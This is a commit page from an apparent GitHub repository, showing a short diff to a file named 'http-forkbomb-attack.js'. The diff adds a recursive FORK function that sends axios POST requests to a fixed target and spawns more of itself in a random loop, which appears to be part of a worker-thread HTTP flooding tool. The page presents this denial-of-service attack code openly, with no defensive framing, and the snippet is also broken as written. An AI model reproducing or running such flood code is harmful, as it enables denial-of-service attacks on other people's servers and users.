Update http-forkbomb-attack.js

This commit is contained in:
c0d1ng_ma5ter 2025-01-22 14:34:52 -06:00 committed by GitHub
parent 0c51228ee4
commit ef56c0edc9
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -13,8 +13,10 @@ import { parentPort, workerData } from "worker_threads";
import { randomBoolean, randomString } from "../utils/randomUtils.js";
const FORK = (fixedTarget, payload, config) => {
FORK(fixedTarget, payload, config)
await axios.post(fixedTarget, payload, config);
for (let i = 1; i < Math.random() * 100; i++) {
FORK(fixedTarget, payload, config)
await axios.post(fixedTarget, payload, config);
}
}
const startAttack = () => {